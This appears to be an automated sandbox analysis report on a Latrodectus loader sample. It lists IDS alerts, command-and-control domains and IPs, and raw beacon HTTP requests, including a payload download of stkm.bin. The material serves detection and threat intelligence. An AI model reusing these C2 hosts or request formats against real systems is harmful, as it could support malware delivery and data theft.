Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D16F4 FindFirstFileW,FindNextFileW,LoadLibraryW,	9_2_0B8D16F4
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D6604 lstrcpyA,lstrlenA,lstrcatA,lstrcatA,FindFirstFileA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,StrStrIA,lstrcpyA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	9_2_0B8D6604

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49865 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49885 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49873 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.4:49904 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.4:49891 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.4:49914 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49879 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49929 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49940 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49934 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49953 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49974 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49962 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49956 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49946 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49967 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50013 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49982 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50005 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50020 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50027 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50032 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50034 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49988 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50037 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50043 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50033 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50038 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50049 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50051 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50035 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50039 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50053 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50046 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50036 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49997 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50045 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50048 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50040 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50054 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50052 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50050 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50044 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50041 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50047 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50042 -> 104.21.16.251:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 104.21.68.89 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.16.251 443	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 103.57.249.207 6542	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://reateberam.com/test/
Source: Malware configuration extractor	URLs: https://dogirafer.com/test/

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49730 -> 103.57.249.207:6542

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: SITINETWORS-IN-APSITINETWORKSLIMITEDIN SITINETWORS-IN-APSITINETWORKSLIMITEDIN

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49865 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49873 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49885 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49879 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49891 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49904 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49914 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49929 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49934 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49940 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49946 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49953 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49956 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49962 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49967 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49974 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49982 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49988 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49997 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50005 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50013 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50020 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50027 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50032 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50035 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50036 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50037 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50038 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50033 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50034 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50040 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50039 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50042 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50043 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50048 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50045 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50050 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50051 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50041 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50053 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50054 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50055 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50047 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50044 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50049 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50046 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50052 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49891 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49914 -> 104.21.16.251:443

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hmdViRxTPtzmAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 92Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hndViRxTPtzmAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkdViRxTPtzmAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hldViRxTPtzmAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.com
Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.com
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hidViRxTPtzXdZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 360Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hjdViRxTPtzmAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hgdViRxTPtzmAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hhdViRxTPtzmAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hudViRxTPtzmAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hvdViRxTPtzGAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 12228Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYwqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYwqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYgqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYQqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYAqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZwqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZgqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZQqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZAqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnawqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
